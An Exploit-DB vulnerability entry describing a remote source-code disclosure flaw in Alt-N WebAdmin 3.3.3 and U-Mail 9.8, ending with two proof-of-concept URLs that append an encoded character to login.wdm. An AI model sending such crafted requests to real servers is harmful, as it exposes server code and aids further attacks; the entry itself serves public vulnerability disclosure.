Alt-N WebAdmin 3.3.3 - Remote Source Code Information Disclosure

EDB-ID:

35119

CVE:

N/A


Author:

wsn1983

Type:

remote


Platform:

Windows

Date:

2010-12-17


source: https://www.securityfocus.com/bid/45476/info

Alt-N WebAdmin is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view the source code of files in the context of the server process; this may aid in further attacks.

The following versions are affected:

Alt-N WebAdmin 3.3.3
U-Mail 9.8 for Windows
U-Mail GateWay 9.8 for Windows 

http://www.example.com/login.wdm%20
http://www.example.com/login.wdm%2e